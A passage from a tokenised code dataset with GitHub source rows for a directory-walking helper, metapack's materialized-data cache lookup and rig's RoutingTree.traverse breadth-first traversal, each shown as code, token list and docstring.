"# see if we are at the top",
"if",
"new_path",
"==",
"bottom",
":",
"return",
"for",
"x",
"in",
"walk_up",
"(",
"new_path",
")",
":",
"yield",
"x"
] | mimic os.walk, but walk 'up' instead of down the directory tree
:param bottom:
:return: | [
"mimic",
"os",
".",
"walk",
"but",
"walk",
"up",
"instead",
"of",
"down",
"the",
"directory",
"tree",
":",
"param",
"bottom",
":",
":",
"return",
":"
] | train | https://github.com/Metatab/metapack/blob/8365f221fbeaa3c0be9091f2eaf3447fd8e2e8d6/metapack/util.py#L254-L286 |
Metatab/metapack | metapack/util.py | get_materialized_data_cache | def get_materialized_data_cache(doc=None):
"""Return the cache directory where data can be written during a build, usually for
a Jupyter notebook that generates many files for each execution"""
from metapack.constants import MATERIALIZED_DATA_PREFIX
from os.path import join
if not doc:
from metapack import Downloader
downloader = Downloader()
return downloader.cache.getsyspath(MATERIALIZED_DATA_PREFIX)
else:
dr = doc._cache.getsyspath(join(MATERIALIZED_DATA_PREFIX, doc.name))
ensure_dir(dr)
return dr | python | def get_materialized_data_cache(doc=None):
"""Return the cache directory where data can be written during a build, usually for
a Jupyter notebook that generates many files for each execution"""
from metapack.constants import MATERIALIZED_DATA_PREFIX
from os.path import join
if not doc:
from metapack import Downloader
downloader = Downloader()
return downloader.cache.getsyspath(MATERIALIZED_DATA_PREFIX)
else:
dr = doc._cache.getsyspath(join(MATERIALIZED_DATA_PREFIX, doc.name))
ensure_dir(dr)
return dr | [
"def",
"get_materialized_data_cache",
"(",
"doc",
"=",
"None",
")",
":",
"from",
"metapack",
".",
"constants",
"import",
"MATERIALIZED_DATA_PREFIX",
"from",
"os",
".",
"path",
"import",
"join",
"if",
"not",
"doc",
":",
"from",
"metapack",
"import",
"Downloader",
"downloader",
"=",
"Downloader",
"(",
")",
"return",
"downloader",
".",
"cache",
".",
"getsyspath",
"(",
"MATERIALIZED_DATA_PREFIX",
")",
"else",
":",
"dr",
"=",
"doc",
".",
"_cache",
".",
"getsyspath",
"(",
"join",
"(",
"MATERIALIZED_DATA_PREFIX",
",",
"doc",
".",
"name",
")",
")",
"ensure_dir",
"(",
"dr",
")",
"return",
"dr"
] | Return the cache directory where data can be written during a build, usually for
a Jupyter notebook that generates many files for each execution | [
"Return",
"the",
"cache",
"directory",
"where",
"data",
"can",
"be",
"written",
"during",
"a",
"build",
"usually",
"for",
"a",
"Jupyter",
"notebook",
"that",
"generates",
"many",
"files",
"for",
"each",
"execution"
] | train | https://github.com/Metatab/metapack/blob/8365f221fbeaa3c0be9091f2eaf3447fd8e2e8d6/metapack/util.py#L339-L355 |
project-rig/rig | rig/place_and_route/routing_tree.py | RoutingTree.traverse | def traverse(self):
"""Traverse the tree yielding the direction taken to a node, the
co-ordinates of that node and the directions leading from the Node.
Yields
------
(direction, (x, y), {:py:class:`~rig.routing_table.Routes`, ...})
Direction taken to reach a Node in the tree, the (x, y) co-ordinate
of that Node and routes leading to children of the Node.
"""
# A queue of (direction, node) to visit. The direction is the Links
# entry which describes the direction in which we last moved to reach
# the node (or None for the root).
to_visit = deque([(None, self)])
while to_visit:
direction, node = to_visit.popleft()
# Determine the set of directions we must travel to reach the
# children
out_directions = set()
for child_direction, child in node.children:
# Note that if the direction is unspecified, we simply
# (silently) don't add a route for that child.
if child_direction is not None:
out_directions.add(child_direction)
# Search the next steps of the route too
if isinstance(child, RoutingTree):
assert child_direction is not None
to_visit.append((child_direction, child))
# Yield the information pertaining to this Node
yield direction, node.chip, out_directions | python | def traverse(self):
"""Traverse the tree yielding the direction taken to a node, the
co-ordinates of that node and the directions leading from the Node.
Yields
------
(direction, (x, y), {:py:class:`~rig.routing_table.Routes`, ...})
Direction taken to reach a Node in the tree, the (x, y) co-ordinate
of that Node and routes leading to children of the Node.
"""
# A queue of (direction, node) to visit. The direction is the Links
# entry which describes the direction in which we last moved to reach
# the node (or None for the root).
to_visit = deque([(None, self)])
while to_visit:
direction, node = to_visit.popleft()
# Determine the set of directions we must travel to reach the
# children
out_directions = set()
for child_direction, child in node.children:
# Note that if the direction is unspecified, we simply
# (silently) don't add a route for that child.
if child_direction is not None:
out_directions.add(child_direction)
# Search the next steps of the route too
if isinstance(child, RoutingTree):
assert child_direction is not None
to_visit.append((child_direction, child))
# Yield the information pertaining to this Node
yield direction, node.chip, out_directions | [
"def",
"traverse",
"(",
"self",
")",
":",
"# A queue of (direction, node) to visit. The direction is the Links",
"# entry which describes the direction in which we last moved to reach",
"# the node (or None for the root).",
"to_visit",
"=",
"deque",
"(",
"[",
"(",
"None",
",",
"self",
")",
"]",
")",
"while",
"to_visit",
":",
"direction",
",",
"node",
"=",
"to_visit",
".",
"popleft",
"(",
")",
"# Determine the set of directions we must travel to reach the",
"# children",
"out_directions",
"=",
"set",
"(",
")",
"for",
"child_direction",
",",
"child",
"in",
"node",
".",
"children",
":",
"# Note that if the direction is unspecified, we simply",
"# (silently) don't add a route for that child.",
"if",
"child_direction",
"is",
"not",
"None",
":",
"out_directions",
".",
"add",
"(",
"child_direction",
")",
"# Search the next steps of the route too",
"if",
"isinstance",
"(",
"child",
",",
"RoutingTree",
")",
":",
"assert",
"child_direction",
"is",
"not",
"None",
"to_visit",
".",
"append",
"(",
"(",
"child_direction",
",",
"child",
")",
")",
"# Yield the information pertaining to this Node",
"yield",
"direction",
",",
"node",
".",
"chip",
",",
"out_directions"
] | Traverse the tree yielding the direction taken to a node, the
co-ordinates of that node and the directions leading from the Node.
Yields
------
(direction, (x, y), {:py:class:`~rig.routing_table.Routes`, ...})
Direction taken to reach a Node in the tree, the (x, y) co-ordinate
of that Node and routes leading to children of the Node. | [
"Traverse",
"the",
"tree",
"yielding",
"the",
"direction",
"taken",
"to",
"a",
"node",
"the",
"co",
"-",
"ordinates",
"of",
"that",
"node",
"and",
"the",
"directions",
"leading",
"from",
"the",
"Node",
"."
] | train | https://github.com/project-rig/rig/blob/3a3e053d3214899b6d68758685835de0afd5542b/rig/place_and_route/routing_tree.py#L96-L128 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.